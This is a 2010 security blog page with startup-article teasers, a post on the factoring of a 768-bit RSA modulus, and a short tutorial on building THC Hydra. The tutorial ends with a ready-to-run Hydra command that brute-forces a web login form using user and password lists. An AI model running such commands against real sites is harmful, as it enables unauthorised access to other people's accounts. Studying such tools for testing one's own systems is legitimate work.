Pages

What Programming Language Should I Use to Build a Startup?

Often entrepreneurs ask me 'What technology should I build my startup on?' There is no right or wrong answer to this question. It's a decision every company makes for itself, depending on what it's trying to build and the skills of its cofounders. Nonetheless, there are a few rules that one should adhere to. We discuss them in this blog post.

Incident Response Policy

What happens in your company when a production incident occurs? Usually in a typical startup, you will see engineers running around frantically trying to resolve the problem. However, as soon as the incident is resolved, they forget about it and go back to their usual business. A good incident response policy can help bring order into chaos. We provide a sample template in this blog post.

Why Software Deadlines Never Make Sense

We discuss why software deadlines usually don't make sense.

Analyzing Front-End Performance With Just a Browser

We discuss a number of freely available online tools which can be used to analyze bottlenecks in your website.

Why Smaller Businesses Can't Ignore Security and How They Can Achieve It On a Budget

In this article, we show that security is both important and achievable for smaller companies without breaking a bank.

Saturday, February 20, 2010

Using THC Hydra to bruteforce passwords

I've started experimenting with THC Hydra to brute-force passwords on my home Ubuntu box.

1. First, install OpenSSL and GTK toolkit dependencies, which are required by Hydra.
sudo apt-get install libssl-dev libgtk2.0-dev

2. Next, get the Hydra source code.
wget -c http://freeworld.thc.org/releases/hydra-5.4-src.tar.gz

3. Unpack the archive.
tar -xzvf hydra-5.4-src.tar.gz
cd hydra-5.4-src/

4. Compile the Hydra
./configure
vi Makefile <- and remove the "-lpq" and "-DLIBPOSTGRES" statements
make

5. hydra -L users.txt -P password.txt -e ns -vV -t 1 site.com http-post-form "/bb/login:email=^USER^&password=^PASS^:Not allowed"

768-bit RSA modulus has been factored

A rather exciting paper appeared on ePrint a few days ago: http://eprint.iacr.org/2010/006.pdf
A team of researchers succeeded in factoring a 768-bit RSA modulus.
In many practical applications nowadays, we use a larger 1024-bit RSA modulus for signatures and encryption. This result raises a question of "For how long are 1024-bit encryption/signatures secure?". The authors claim that they are for the next three-four years, and suggest switching onto larger modulus such as 2048.

Friday, February 19, 2010

The security blog is born.

Today, I decided to create a blog with my ruminations on the theory and practical applications of information security. I hope that my readers will find it useful!